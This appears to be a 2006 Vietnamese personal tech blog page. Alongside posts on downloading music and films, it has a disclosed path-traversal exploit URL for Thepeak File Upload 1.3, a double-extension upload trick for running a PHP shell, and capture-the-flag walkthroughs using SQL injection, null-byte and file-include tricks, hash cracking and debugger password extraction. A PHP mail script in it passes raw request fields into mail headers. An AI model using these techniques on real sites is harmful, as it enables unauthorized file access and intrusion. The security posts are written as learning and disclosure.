Download nhạc từ các trang nhạc lớn của Việt Nam

31 Tháng Mười 2006
@ 02:27
Ý kiến [0]
Bug đầu tiên của tôi trên securityfocus
(Được đăng bởi: Phạm Đức Hải)
Hí hí, mấy ngày nay không vào securityfocus.com, hôm nay vào thấy nó đã submit bug của mình report lần trước.
Thepeak File Upload v1.3 : Read file vulneability
Thepeak Index.PHP Source Code Information Disclosure Vulnerability
Mà cả tuần nay không có thời gian đọc thêm về secu.

Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!
Ý kiến [0] - Chuyên mục: Bảo mật | Hack


31 Tháng Mười 2006
@ 01:59
Ý kiến [0]
Download nhạc tại giaidieu.net
(Được đăng bởi: Phạm Đức Hải)
Trang nhạc Giaidieu.net có nhạc khá phong phú và chất lượng khá tốt.
Để download được nhạc ở đây về bạn vào trang : http://www.guru.net.vn/media.aspx và xem hướng dẫn trong đó.
Ý kiến [0] - Chuyên mục: Âm nhạc |  Lời bài hát


31 Tháng Mười 2006
@ 09:40
Ý kiến [0]
Test php mail
(Được đăng bởi: Phạm Đức Hải)
Đây là đoạn code để test chức năng send mail khi dùng php:
<html>
<body>

<?php
if (isset($_REQUEST['email']))
//if "email" is filled out, send email
  {
  //send email
  $email = $_REQUEST['email'] ; 
  $to = $_REQUEST['to'] ;
  $subject = $_REQUEST['subject'] ;
  $message = $_REQUEST['message'] ;
  mail( $to, "Subject: $subject",$message, "From: $email" );
  echo "Thank you for using our mail form";
  }
else
//if "email" is not filled out, display the form
  {
  echo "<form method='post' action='phpmail.php'>
  Email nguoi gui: <input name='email' type='text' /><br />
  Email nguoi nhan: <input name='to' type='text' /><br />
  Subject: <input name='subject' type='text' /><br />
  Message:<br />
  <textarea name='message' rows='15' cols='40'>
  </textarea><br />
  <input type='submit' />
  </form>";
  }
?>

</body>
</html>
Ý kiến [0] - Chuyên mục: PHP


30 Tháng Mười 2006
@ 07:58
Ý kiến [0]
Some examples of using Unix find command.
(Được đăng bởi: Phạm Đức Hải)
Nguồn : Some examples of using UNIX find command.
Introduction

The find command allows the Unix user to process a set of files and/or directories in a file subtree.

You can specify the following:

  • where to search (pathname)
  • what type of file to search for (-type: directories, data files, links)
  • how to process the files (-exec: run a process against a selected file)
  • the name of the file(s) (-name)
  • perform logical operations on selections (-o and -a)
Search for file with a specific name in a set of files (-name)
find . -name "rc.conf" -print

This command will search in the current directory and all sub directories for a file named rc.conf.

Note: The -print option will print out the path of any file that is found with that name. In general -print wil print out the path of any file that meets the find criteria.

How to apply a unix command to a set of file (-exec).
find . -name "rc.conf" -exec chmod o+r '{}' \;

This command will search in the current directory and all sub directories. All files named rc.conf will be processed by the chmod -o+r command. The argument '{}' inserts each found file into the chmod command line. The \; argument indicates the exec command line has ended.

The end results of this command is all rc.conf files have the other permissions set to read access (if the operator is the owner of the file).

How to apply a complex selection of files (-o and -a).
find /usr/src -not \( -name "*,v" -o -name ".*,v" \) '{}' \; -print

This command will search in the /usr/src directory and all sub directories. All files that are of the form '*,v' and '.*,v' are excluded. Important arguments to note are:

  • -not means the negation of the expression that follows
  • \( means the start of a complex expression.
  • \) means the end of a complex expression.
  • -o means a logical or of a complex expression.
    In this case the complex expression is all files like '*,v' or '.*,v'

The above example is shows how to select all file that are not part of the RCS system. This is important when you want go through a source tree and modify all the source files... but ... you don't want to affect the RCS version control files.

How to search for a string in a selection of files (-exec grep ...).
find . -exec grep "www.ajaxviet.com" '{}' \; -print

This command will search in the current directory and all sub directories. All files that contain the string will have their path printed to standard output.

If you want to just find each file then pass it on for processing use the -q grep option. This finds the first occurrance of the search string. It then signals success to find and find continues searching for more files.

find . -exec grep -q "www.ajaxviet.com" '{}' \; -print

This command is very important for process a series of files that contain a specific string. You can then process each file appropriately. An example is find all html files with the string "www.athabascau.ca". You can then process the files with a sed script to change those occurrances of "www.athabascau.ca" with "intra.athabascau.ca".

Ý kiến [0] - Chuyên mục: Linux


30 Tháng Mười 2006
@ 06:39
Ý kiến [0]
Nâng cấp blog lên 1.9
(Được đăng bởi: Phạm Đức Hải)
Nâng cấp blog lên 1.9 rồi happy
Bản này khắc phục được khá nhiều lỗi và có thêm các chức năng mới.
Bây giờ mệt rồi, để hôm sau nói rõ hơn vậy.
Mệt đứt hơi !!!
Ý kiến [0] - Chuyên mục: Linh tinh


27 Tháng Mười 2006
@ 09:38
Ý kiến [0]
Download báo giấy trực tuyến docbao.com.vn
(Được đăng bởi: Phạm Đức Hải)
Ngày hôm qua, một người bạn gửi cho tôi link trang báo giấy trực tuyến docbao.com.vn.
Trang này quét tất cả báo giấy đưa lên mạng, chủng loại khá phong phú, người bạn đó nói rất thích download báo ở đó, download theo số để mang về nhà đọc happy và nói thêm nhiều người cũng thích như thế.
Để đáp lại sự nhiệt tình của bạn, tôi đã bổ xung chức năng download báo giấy trực tuyến vào chương trình Media Downloader. Hy vọng các bạn sẽ có những số báo mình thích.

Các bạn có thể tham khảo và sử dụng tại đây và đừng quên quảng cáo cho bạn bè nhé !
Ý kiến [0] - Chuyên mục: Âm nhạc | Bạn bè - Người thân | Giải trí


26 Tháng Mười 2006
@ 02:06
Ý kiến [2]
Media Downloader thêm trang Bennhac.com
(Được đăng bởi: Phạm Đức Hải)
Bennhac.com là một trang nghe nhạc với số lượng bài khá lớn trên 15.000 bài hát,hất lượng nghe tốt.
Media Downloader chính thức thêm trang Bennhac.com vào chương trình. Hy vọng các bạn sẽ download được các bài hát mình thích.
Chúc vui happy !
Ý kiến [2] - Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí


25 Tháng Mười 2006
@ 03:19
Ý kiến [0]
Ra mắt Media Downloader - Beta 1
(Được đăng bởi: Phạm Đức Hải)
Nhằm đáp lại sự nhiệt tình của người yêu nhạc, hôm nay tôi cho ra mắt bản Media Downloader - Beta 1 tại địa chỉ http://media.ajaxviet.com.
Phiên bản này cho phép lấy link download file nhạc của 3 site lớn tại Việt nam :
Trong thời gian tới tôi sẽ cập nhật một số site khác, tôi rất mong các bạn đóng góp ý kiến để tôi có thể hoàn thiện sản phẩm này.
Đọc chi tiết ...
Ý kiến [0] - Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí | Website


24 Tháng Mười 2006
@ 03:10
Ý kiến [0]
Các lỗi có thể có với upload file
(Được đăng bởi: Phạm Đức Hải)
Hiện nay bất kỳ 1 web site nào cũng biên tập 1 cách trực tuyến WYSIWYG, không giống như ngày trước việc nhập dữ liệu được thực hiện chủ yếu qua 1 chương trình client kết nối với database, viết bằng VB chẳng hạn và nhập qua FTP. Khi biên tập WYSIWYG thì một phần gần như không thể thiếu là upload file.
Dưới góc độ bảo mật tôi xin đưa ra các lỗi nguy hiểm có thể gặp phải với upload file :

- Đầu tiên, ở góc độ lập trình : rất nhiều lập trình viên không ý thức được sự nguy hiểm của phần upload file nên họ sẽ rất dễ mắc phải các lỗi sau :
  • Phần upload file không chứng thực --> ai cũng có thể upload file.
  • Không filter các loại file cho phép upload, hoặc có filter nhưng vẫn gặp lỗi (tôi sẽ nói sau) -->attacker dễ dàng upload các file nguy hiểm như : .php, .asp,.pl,... Phải filter theo kiểu chỉ cho phép các file được upload, chứ không nên theo kiều cấm các các file nguy hiểm- vì nó nhiều, hoặc phát sinh.
  • Sử dụng mặc định các bộ soạn thảo trực quan (WYSIWYG) như FCK Editor, HTMLArea, FreeTextBox,... thậm trí là không xóa cả ví dụ mẫu, tiềm ẩn trong các phần mềm này có rất nhiều lỗi cho phép upload file. Việc cài mặc định giúp attacker dễ dàng định vị hoặc đoán được vị trí của file bị lỗi. VD : trong FCk có file test.html có thể upload file được. Lỗi này tôi cá là bất kỳ lập trình viên nào nếu đã từng viết phần upload file cũng mắc phải, vì chỉ chú ý xem nó có chạy hay không big grin.
  • Nhầm tưởng writeable là 777 --> thật ngớ ngẩn sad
  • Không đổi tên file upload, hoặc có đổi nhưng dễ đoán. Cái này bạn đừng nghĩ là vớ vẩn, vì 1 trong các cái attacker có thể chạy được file upload lên là họ phải biết vị trí file upload lên nằm ở chỗ nào.
- Đối với quản trị website : nhiều khi các admin không phải là người code, họ sử dụng phần mềm do người khác viết. Các lỗi khi sử dụng phần mềm có upload :
  • Không config filter file, hoặc config sai.
  • Đặt quyền không đúng cho các thư mục được upload file (có quyền ghi). Phải đặt theo nguyên tắc : có quyền ghi thì không có quyền chạy, chạy thì không ghi. Thông thường admin hay đánh đồng 777 với ghi (trên *nix), trên wins thì vẫn để toàn quyền đối với thư mục đã có quyền ghi.
- Lỗi sau đây thường cả coder và admin đều không biết hoặc không để ý, lỗi này thì attacker rất thích, tôi cũng thích big grin. Đối với các server chạy apache thì nó sẽ có vấn đề với file extension. Chẳng hạn bạn khai báo một số extenion : php, jpg, bmp, png nhưng trong khi site của bạn là 1 site giải trí cho phép cả các file .swf, .mp3,.wav, ... điều gì sẽ xảy ra nếu attacker upload 1 file như sau : test.php.mp3 --> cái hay ở chỗ này đấy. Apache nó không hiểu extension .mp3 --> nó sẽ đối xử file trên như 1 file php, file php trên là 1 con shell chẳng hạn --> thế là site đã hy sinh rồi đấy.

Hy vọng với bài viết nhỏ này bạn sẽ tìm được cái gì đó cho riêng mình, bạn nào có bổ xung thêm gì thì tôi sẽ rất vui đấy happy.
Ý kiến [0] - Chuyên mục: Bảo mật | Hack


24 Tháng Mười 2006
@ 02:15
Ý kiến [0]
PHP File Include
(Được đăng bởi: Phạm Đức Hải)
PHP File Include - Phát hiện, khai thác và khắc phục (Bài viết của Guanyu - Mod HVA 2003)
Bài viết này tuy đã lâu rồi, nhưng hiện nay lỗi này vẫn còn khá phổ biến, nên tôi post lại bài này.
Bài này thực sự có ích cho những lập trình viên sử dụng PHP, thông thường những lập trình viên nếu có chú ý đến bảo mật thì cũng chỉ chủ yếu xử lí SQL Injection mà không biết đến cái gọi là PHP injection.
Đây cũng là 1 lỗi rất phổ biến mà hacker khai thác ở mức web application.

Bài viết này là một bài tổng kết lại quá trình tìm hiểu lỗi PHP File Include. Có thể nó hơi khó hiểu, nhưng mình hi vọng các bạn có thể định nghĩa rõ hơn về lỗi này cũng như tự mình có thể phát hiện lổi trong các sản phẩn PHP. Xin nói thâm là các đánh giá dưới đây là theo góc nhìn của QVT chứ không phải đánh giá của bất kì hệ thống nào.

|---------------------------------
Mức độ phổ thông: 5-6
Mức độ nguy hiểm: 7-9
Mục tiêu tấn công: Server
Vị trí kẻ tấn công: Client
---------------------------------|
Đọc chi tiết ...
Ý kiến [0] - Chuyên mục: Bài viết hay | Bảo mật | Hack


24 Tháng Mười 2006
@ 09:55
Ý kiến [0]
http://tintuc.ajaxviet.com
(Được đăng bởi: Phạm Đức Hải)
Ra mắt trang tin tức http://tintuc.ajaxviet.com hoặc http://tintonghop.be
Trang này ra đời như 1 minh chứng cho bài viết về thế giới tin.
Chiều tối qua xem lại các comment, có hứng viết luôn ra trang này happy.
Chất lượng chưa được tốt vì tôi chưa làm cache, hơn nữa server cũng hơi chậm.
Tôi đã test ở client tốc độ chạy cực nhanh big grin.
Đọc chi tiết ...
Ý kiến [0] - Chuyên mục: Ajax | Giải trí | Website


23 Tháng Mười 2006
@ 03:24
Ý kiến [1]
Hướng dẫn download phim từ VTC - Mới
(Được đăng bởi: Phạm Đức Hải)
Cập nhật : 15/06/2007 (download theo link)
http://www.guru.net.vn/media.aspx

Trong thời gian qua,qua log Internet Searches tôi thấy vẫn có rất nhiều bạn tìm cách download phim từ VTC, nên tôi quyết định viết bài này.
Cách download phim đối với website VTC cũ bạn có thể tham khảo tại đây.
Mặc dù VTC mới làm lại nhưng vẫn chưa hoàn thiện, cho nên tôi chỉ hướng dẫn cách download thủ công chứ không viết hẳn 1 chương trình giống như download nhạc số, khi nào VTC hoàn thiện tôi sẽ làm như vậy happy.
Nói thêm là : bản website VTC mới này dùng rất bất tiện, và có nhiều lỗi.
Mà down về xem cho ổn định chứ xem trực tiếp trên đó thì đứt mạng 1 phát thì lại phải xem từ đầu, chẳng thể chỉnh được cái gì --> quá bất tiện. Mà không hiểu sao họ ko để luôn link để download nhỉ ?
Công cụ : Trình duyệt IE, Flashget
Các bước tiến hành :

Bạn sử dụng trình duyệt IE mở trang http://www.vtc.com.vn chọn phim cần xem, bấm vào nó để nó hiện lên trên màn hình TV:
vtc1.JPG

Bạn bấm chuột phải vào màn hình TV không thấy phản ứng gì, lúc này bạn đưa chuột qua và thấy có dòng chữ : "Click to activate and use this control"
vtc2.JPG

Sau đó bạn click chuột trái 1 phát vào màn hình, ok ?
Sau đó bạn click lại chuột phải xem nào ? Nó sẽ hiện ra 1 popup --> bạn chọn Properties --> nó sẽ hiện ra của sổ Properties bạn sẽ nhìn thấy ở đó có 1 cái link dạng :
http://www.vtc.com.vn/news/chuongtrinhvtc2/phimtruyen/detail2200.asx
Bạn chạy link này sẽ nhận được URL thực của phim :
mms://mail.vtc.com.vn:8090/VtcPortal_1445/phimnnanhhunghiepnghia.wmv
Tuy nhiên link này vẫn chưa download được (cái này giống bản VTC cũ ), bạn cần đổi :
mms --> rtsp vì VTC dùng media server, với rtsp protocol :
RTSP/1.0
Server: WMServer/9.1.1.3814
sẽ nhận được
rtsp://mail.vtc.com.vn:8090/VtcPortal_1445/phimnnanhhunghiepnghia.wmv
Hoặc bạn có thể đổi mms thành http cũng được, tôi khuyên bạn nên dùng rtsp.
Sau đó bạn dùng Flashget để download phim về.
Có gì thắc mặc bạn có thể liên hệ với tôi. ;-)
Chúc các bạn vui vẻ !
Ý kiến [1] - Chuyên mục: Âm nhạc | Giải trí | Phim ảnh | Website


20 Tháng Mười 2006
@ 08:04
Ý kiến [3]
DasBlog 1.9 Released : new features
(Được đăng bởi: Phạm Đức Hải)

Phiên bản Dasblog 1.9.6264.0 đã có, một điều đặc biệt trong phiên bản này là có tiếng Việt.
 Scott Hanselman đã tích hợp bản tiếng Việt do Phạm Đức Hải việt hóa vào trong hệ thống, đặc biệt nữa là sẽ có culture vi-vn trong phiên bản này, nên toàn bộ ngày giờ sẽ được chuyển sang Tiếng Việt.
Phiên bản tiếng Việt do tôi việt hóa chưa được hoàn thiện lắm nếu bạn nào có thể làm tốt hơn hãy liên hệ
với tôi nhé !
Download bản Dasblog 1.9.6264.0 tại đây :
download here: 1.9.6264.0
Thanks Scott !!!

Here's some of the new features.

  • Much better multi-user/blogger support including a Top Posters macro and total comments - from Christoph De Baene
  • TagCloud Support - from Scott
  • Support for Mobile Browsers like Blackberries and SmartPhones - from Scott
    • Note the large section in your web.config and the mobile theme that is required for this support.
  • Huge (100x+) speedup in Macro execution - from Scott
  • Support for If-Not-Modified to speed up execution, improve RSS bandwidth and CPU cycles - from Scott
  • Direct Feedburner Support with 301 redirection for RSS and Atom feeds. Don't lose a single subscriber. We're the only blog with direct support for Feedburner and Feedflare I believe. - from Scott
    • I encourage you to check out FeedBurner. You can add FeedFlare to your posts, and modify your feed in ways DasBlog can't. They also handle your Feed bandwidth and provide rich statistics. It's free ($ for advanced stats) and it's very powerful. Do be aware that when you make the decision to move over to FeedBurner your existing feeds will start redirecting folks to FeedBurner immediately. That's part of the power of the whole thing, but be warned.
  • Delete comments directly from your mail reader - from Omar
  • Comment moderation option
  • New themes out of the box, 18 at last count - from Many Folks
  • New XML-RPC support for newMediaObject and new version of XML-RPC.NET from Charles Cook - from Omar and Giuseppe Dipietro
  • Macros for Next Post and Previous Post - Justice Gray
    • Check the DasBlog theme or add this line to the top of your itemtemplate.blogtemplate.
      <%PreviousLink("&laquo;&nbsp;",25)%><%MainPageEntryLink("Main", "|")%><%NextLink("&nbsp;&raquo;",25)%><br/>
  • A few security and XSS fixes
  • Support for Gravatars, images of your choosing that appear next to your comments - John Forsythe
  • Support for limited HTML markup in comments
  • Emails removed to avoid having email addresses stolen from Feeds
  • Added an Email page for leaving comments to the author, includes Captcha
  • New support for RSD so client software can autoconfigure itself - from Omar
  • Pluggable Rich Text Editor, choose from the latest version of FreeTextBox or FCKEditor or write your own adapter - from Josh Flanagan
  • Support for alternate SMTP ports
  • We work with Windows Live Writer out of the box - from Omar
  • Support for CoComment - from Scott
  • Microsummary support for Firefox 2.0 Beta - from Scott
  • Organized source, build, and packing for clarity - from Josh Flanagan
  • New Feed Icons - from Omar
  • Autometic generation of Google SiteMaps - from Scott
  • Automatic disabling of Comments after a certain number of days. Also manual "close comments" support - from Omar
  • ContentLookAhead show future dated posts - from Josh Flanagan
  • Other fixes and suggestions from Tomas Restrepo, Jason Follas, Rene Lebherz and Steven Rockarts. Added entry CPU usage optimizatons from George V. Reilly.
  • Ajax Autosave Drafts support from Steven Rockarts and Justice Gray.
  • Better strings and support for German from Alexander Groß, Portuguese from Adelino Araújo, and Vietnamese from Phạm Đức Hải.
  • Many great new themes
  • Updated readme.rtf from Tim Sherill
  • Single-handed support of DasBlog.info and DasBlog.us to the enthusiastic and tireless Tom Watts!
  • Welcome to new team members Alexander Groß, Paul Van Brenck, and John Forsythe who really did a lot of work to make this release possible! Thanks to Jacob Proffitt for doing some crazy debugging of caching on FireFox that will be in a point release soon.
  • New DasBlog Badges/Artwork from Alexander Groß...download them here: File Attachment: DasBlog Artwork.zip (1015 KB)

Ý kiến [3] - Chuyên mục: Blog |  CSharp | Ajax | Mã nguồn mở | Việt hóa | Website


19 Tháng Mười 2006
@ 05:17
Ý kiến [0]
Application Cracking 1
(Được đăng bởi: Phạm Đức Hải)
Application Cracking 1
Description: Find the Password.
Difficulty: easy
Win (.zip)

Công cụ : OllyDbg bạn down về giải nén ra và dùng happy + Hướng dẫn chung

Tiến hành :
Bước 1: Chạy thử file app1.exe xem thế nào. (Sau đó tắt đi)
Bước 2 : Mở OllyDbg và load file app1.exe lên --> nó không báo lỗi gì là ok.
Có thể làm tiếp bước sau.
Bước 3 : Tìm pass, bài này là tìm pass mà.
Trong OllyDbg bấm Alt+E hoặc bấm biểu tượng chữ E trên Menu nó sẽ hiện ra ô "Executable Modules" trong của sổ đó bạn sẽ nhìn thấy cái ứng dụng của chúng ta trong đó.
Bạn nhấn chuột để chọn ứng dụng của chúng ta, sau đó bạn bấm Ctrl+N hoặc chuột phải chọn "View Names". Cái này sẽ cho ta 1 số thông tin hữu ích.
Bạn sẽ tìm thấy dòng sau :

Names in app1, item 42  Address=0040104C  Section=.text  Type=Import Name=MSVBVM60.__vbaStrCmp

Ứng dụng này được viết bằng VB và sử dụng hàm vbaStrCmp để so sánh password.
Bạn cần set breakpoint cho địa chỉ của hàm này, để làm việc đó bạn bấm chuột phải và chọn "Toggle breakpoint" hoặc bấm F2.
Tốt rồi, bây giờ bạn bấm F9 để chạy chương trình. Bạn nhập vào 1 pass bất kỳ, ví dụ ở đây tôi nhập "123456" --> bấm Ok.
Lúc này Breakpoint bên OllyDbg đã hoạt động. Trong cửa sổ con thứ tư của của sổ CPU bạn sẽ nhận thấy có các dòng sau :

0012F3E8   00403F22  RETURN to app1.00403F22 from MSVBVM60.__vbaStrCmp
0012F3EC   0040380C  UNICODE "g7*2+'&1,3"
0012F3F0   0015578C  UNICODE "1234567"

Hàm vbaStrCmp so sánh 2 mật khẩu đó happy --> mật khẩu là : g7*2+'&1,3 --> ok, xong rồi , bạn nhập vào ứng dụng cần crack app1.exe nó sẽ cho bạn mật khẩu nhập vào HBH.
Không có gì phức tạp đúng ko nào ?
Ý kiến [0] - Chuyên mục: Hack


19 Tháng Mười 2006
@ 04:42
Ý kiến [0]
HBH : Application Challenges
(Được đăng bởi: Phạm Đức Hải)
Tiếp theo phần Basic web hacking, tôi định post phần Javascript Hacking nhưng dạo này đang có hứng Cracking nên sẽ post loạt bài về crack tutorial trước happy
Tất cả các bài viết của tôi nhằm mục đích học hỏi, trao đổi kinh nghiệm, ngoài ra không có mục đích gì khác.
Để có thể vượt qua các Application Challenges tại hellboundhackers.org các công cụ cần có là :
  1. OllyDbg : 1 công cụ debug tuyệt hảo, chạy luôn trên wins ko cần cài cắm gì cả, không giống SoftIce, nên sẽ không cần phải "khổ nhục" cài lại máy mỗi lần crack như trước big grin
  2. Hex Editor : cái này thì nhiều lắm, dùng XVI32 khá hay và tiện dụng, hoặc dùng HIEW cũng được
  3. Ngoài ra còn 1 số công cụ khác tôi sẽ nói cụ thể trong từng bài.
Đó là tất cả các công cụ bạn cần để có thể vượt qua các app challenges.

Về kiến thức : bạn không cần biết nhiều lắm cũng có thể vượt qua tất cả các Challenges này. Nhưng tối thiểu bạn phải có những điều sau :
  1. Biết lập trình 1 ngôn ngữ nào đó
  2. Biết sử dụng các công cụ tôi đã giới thiệu
  3. Một chút tư duy happy
Giới thiệu thế đủ rồi, tôi bắt đầu nhé !
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:30
Ý kiến [0]
All Basic Web Hacking
(Được đăng bởi: Phạm Đức Hải)
Basic Web Hacking (hellboundhackers.org)
Xong rồi ! List các bài đây:
Basic Web Hacking 1
Basic Web Hacking 2
Basic Web Hacking 3
Basic Web Hacking 4
Basic Web Hacking 5
Basic Web Hacking 6
Basic Web Hacking 7
Basic Web Hacking 8
Basic Web Hacking 9
Basic Web Hacking 10
Basic Web Hacking 11
Basic Web Hacking 12
Basic Web Hacking 13
Basic Web Hacking 14
asic Web Hacking 15-16

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:27
Ý kiến [0]
Basic Web Hacking 15 -16
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers : Basic Web Hacking 15
Yêu cầu : robots.txt là gì ?
Desc :
For this mission you will need to find a secret file using a common technique to find hidden directories.

robots.txt là gì ?
Bạn tìm hiểu xong sẽ biết cách làm bài này thế nào.
Bài này ngắn quá, tiện thể nói luôn bài 16 vì bài 16 cung ngắn.
Basic Web Hacking 16
Yêu cầu : SQL Inject

Cái này y hệt cái Second form của bài 7

Mấy bài cuối này đơn giản phải ko nào ?

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:21
Ý kiến [0]
Basic Web Hacking 14
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 14
Yêu cầu : HTML

Bài này mới fix lại nhưng rất dễ.
View source :
<!-- ADMINS: Check /newpasswd/admin.txt for the new password. --!>
bạn thấy link pass rồi chứ ?
Get it --> get point happy

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:18
Ý kiến [0]
Basic Web Hacking 13
(Được đăng bởi: Phạm Đức Hải)
Post 1 hồi thấy mệt quá, cố lên sắp hết basic web rồi!
Bài này khá dễ happy
hellboundhackers: Basic Web Hacking 13
Yêu cầu : HTML, form submit
Desc :
Login as George!

Ở đây yêu cầu login với user George, nhưng trong list lại không có. Làm thế nào để có thể submit với user này.
Save page as ...
Sửa lại tí tẹo :
<form method="post" action="http://www.hellboundhackers.org/challenges/basic13/index.php">
<select name="name">
    <option value="Frank">Frank    </option>
    <option value="Johnny">Johnny   </option>
    <option value="Anna">Anna   </option>
    <option value="Jessica">Jessica</option>
    <option value="George">George</option>
</select>

Chú ý thay đổi dòng mày hồng, thêm vào dòng mày đỏ.
Chạy file vừa sửa --> more point!

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:09
Ý kiến [0]
Basic Web Hacking 12
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 12
Yêu cầu : biết về .htaccess, php file include, biết sử dụng John the Ripper
Desc :
Find the password for the protected folder and then access it!
Protected Folder

.htaccess là gì ? --> bạn cần biết cái này (google nhé)
Sau đó chú ý đến cái này:
http://www.hellboundhackers.org/challenges/basic12/index.php?page=challenges.php
đặc biệt là cái : page=challenges.php (vớ dc cái này là dân hack khoái lắm big grin)
lại chú ý đến cái Protected Folder :
http://www.hellboundhackers.org/challenges/basic12/protected/
vậy bạn có ý tưởng nào chưa ?
bạn thử thay đổi tham số page xem sao ?
page=protected/....  chỗ .... là cái mà tôi bảo bạn tìm hiểu đó happy
Lưu ý : /protected/ khác với protected/ đấy nhé !
Sau đó nhận được thông tin mới và áp dụng cách như trên.
Cuối cùng sẽ nhận được :
xxxx:1Gwn39lwmRu9U (chỗ xxx tôi dấu đi rồi, hì hì) --> cái này là pass đã mã hóa bằng DES của *unix
Sau đó lưu cái đó vào 1 file hbh.txt chẳng hạn.

Bây giờ bạn cần biết 1 chút về John the Ripper --> đây là chương trình crack pass rất tuyệt happy
Chạy John với wordlist của Cain
>john -w:Wordlist.txt hbh.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
.......................
Sau đó bạn sẽ nhận được pass bạn cần.

Càng ngày các bài càng hay, đúng ko nào ?
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:54
Ý kiến [0]
Basic Web Hacking 11
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 11
Yêu cầu : Agent là gì ?
Desc :

Access Denied
You are not allowed to see this page for one or both of the following reasons:

    * This page can only be viewed using the Operating System "HellBoundHackersOS"
    * Your User Agent must be "Mozilla" which is the main browser for the OS.

google for more info about Agent.
Cái này gần giống lv 3 : link
Instal : User Agent Switcher
https://addons.mozilla.org/firefox/59/
Change agent : Mozilla (HellBoundHackersOS)

--> Refresh --> Finish!
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:48
Ý kiến [0]
Basic Web Hacking 10
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 10
Yêu cầu : biết cách Fake Proxy
Desc :
The following page can only be seen if your IP range is the one that is allowed. This .htaccess stuff is complicated.

Proxy giúp bạn ẩn danh khi truy cập web. Bạn thử tìm thêm tài liệu đọc về proxy trên google xem.
Bạn lấy proxy ở đây :
http://www.proxy4free.com/
Nếu bạn dùng Firefox thì cách đổi proxy như sau :
Tools --> Options --> Connection Settings... --> Manual proxy configuration
Ok, sau đó bấm vào link mà nó cho trên page --> level up !

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:40
Ý kiến [0]
Basic Web Hacking 9
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 9
Yêu cầu : PHP
Desc :
Search for Files
With this file search engine, you can search files only on the folder files which your administrator has set up for you to search. You can search anything in files and if your search was matched then it would show you the content of that file.

Thử bất kỳ cái gì trong ô tìm kiếm --> sẽ có link :
../basic9/files/search.php?search=test&submit=Search%21
Ở trên có nói các files tìm kiếm sẽ chứa trong 1 thư mục, ở trên là thư mục "files", thử duyệt thư mục đó xem sao ?
Bạn sẽ thấy 1 list các files, file cần tìm là lxxxx.php. Trong ô tìm kiếm ban đầu nhập vào lxxxx.php%00 bạn sẽ nhận được 1 form mới (vì sao có %00 bạn tự tìm hiểu nhé big grin)
Good Job
You doing good!
Continue to 2nd part
--> view source lên xem nào ? Chú ý đoạn code php--> pass ở đó đây!
Vui đây chứ happy

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:25
Ý kiến [0]
Basic Web Hacking 8
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers : Basic Web Hacking 8
Yêu cầu : PHP
Desc :

This time Drake invented a secure PHP and mySQL login, so only his family can login, but the script wasn't as secure as he thought it would be.

Đánh bất kì cái gì vào xem nào --> bắn ra trang báo lỗi --> view source
Thấy thông tin sau : <!--?sql_query-->
SQL Query Error: SELECT * FROM family_db WHERE password='a'
Your Password was not found in our database
SQL injection rồi. Thông tin cần tìm nằm trong bảng family_db.
thử câu lệnh :
Select * from family_db xem sao ?
Nhớ là cậu lệnh này được truyền cho tham số : sql_query
trong form :
.../basic8/secure-area.php
Vậy là bạn có pass rồi đấy !

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:17
Ý kiến [0]
Basic Web Hacking 7
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers : Basic Web Hacking 7
Yêu cầu : biết bảng mã ASCII, javascript, SQL injection
Desc :
This time Mr. Deitry decided to make a cookie login script and he said he decrypted it from ASCII encryption, and for you to login you need to encrypt it. And after you login there is another login but its a Login that uses SQL databases, but he thinks that the SQL login page is vulnerable to a simple SQL injection, and when he gets back from his vacation he would fix it.
View source nhận được : 
<script  language='JavaScript'>
  void(document.cookie='username=sam');
  void(document.cookie='password=jillisdead');
</script>
Nhưng nhập user và pass ở trên vào không được:
http://www.hellboundhackers.org/challenges/basic7/check-cookie.php?username=sam
Thông tin phần trên cho biết để đăng nhập cần user, pass đã được mã hóa.
 Tool mã hóa http://www.yellowpipe.com/yis/tools/encrypter/index.php
Mã hóa "sam" sang binary nhận được : 011100110110000101101101
Ở đâu cần phải đổi lại cookie bằng cách dùng javascript :
javascript:document.cookie="username=011100110110000101101101";
ok, xong chạy lại link sau :
login link
